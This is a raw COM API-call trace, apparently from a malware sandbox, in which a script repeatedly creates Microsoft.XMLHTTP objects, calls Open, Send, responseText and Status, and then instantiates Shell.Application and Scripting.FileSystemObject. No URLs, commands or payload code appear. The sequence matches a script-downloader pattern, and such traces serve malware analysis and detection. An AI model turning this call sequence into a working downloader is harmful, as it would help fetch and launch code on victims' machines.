	[0774.871] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7520) returned 0x0
	[0774.871] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0774.871] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0774.871] ??2@YAPEAX_K@Z () returned 0x62f330
	[0774.871] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0774.871] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0774.871] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0774.871] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7520) returned 0x0
	[0774.871] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7520) returned 0x3
	[0774.871] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0774.871] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7520, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0774.871] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0774.871] longjmp () 
	[0774.872] longjmp () 
	[0774.872] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0774.872] SysStringLen (param_1=0x0) returned 0x0
	[0774.872] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0774.872] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0774.872] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0774.872] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0774.872] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0774.872] ??2@YAPEAX_K@Z () returned 0x62f310
	[0774.872] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0774.872] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0774.872] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0774.872] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0774.872] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0774.872] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0774.872] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0774.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0774.873] longjmp () 
	[0774.873] longjmp () 
	[0774.873] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0774.873] SysStringLen (param_1=0x0) returned 0x0
	[0774.873] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0774.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0774.873] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0774.873] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0774.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0774.873] ??2@YAPEAX_K@Z () returned 0x62f330
	[0774.873] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0774.873] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0774.873] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0774.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0774.874] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0774.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0774.874] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0774.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0774.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0774.874] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0774.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0775.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0775.839] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0775.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0775.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0775.840] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0775.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0775.840] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0775.840] SysStringLen (param_1=0x0) returned 0x0
	[0775.840] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0775.840] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0775.841] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0775.841] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0775.841] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0775.841] ??2@YAPEAX_K@Z () returned 0x62f350
	[0775.841] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0775.841] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0775.841] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0775.841] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0775.841] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0775.841] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0775.841] SysStringLen (param_1=0x0) returned 0x0
	[0775.841] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0775.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0775.844] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0775.844] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0775.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0775.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0775.844] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0778.119] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0778.120] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0778.120] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0778.121] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0778.121] SysStringLen (param_1=0x0) returned 0x0
	[0778.121] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0778.121] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0778.122] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0778.122] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0778.122] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7528) returned 0x0
	[0778.122] ??2@YAPEAX_K@Z () returned 0x62f330
	[0778.122] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7528, pUnkSite=0x62f330) 
	[0778.122] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0778.122] XMLHTTPRequest:IUnknown:Release (This=0x49c7528) returned 0x0
	[0778.122] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0778.122] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0778.122] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0778.122] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0778.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0778.126] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0778.126] SysStringLen (param_1=0x0) returned 0x0
	[0778.126] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0778.126] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
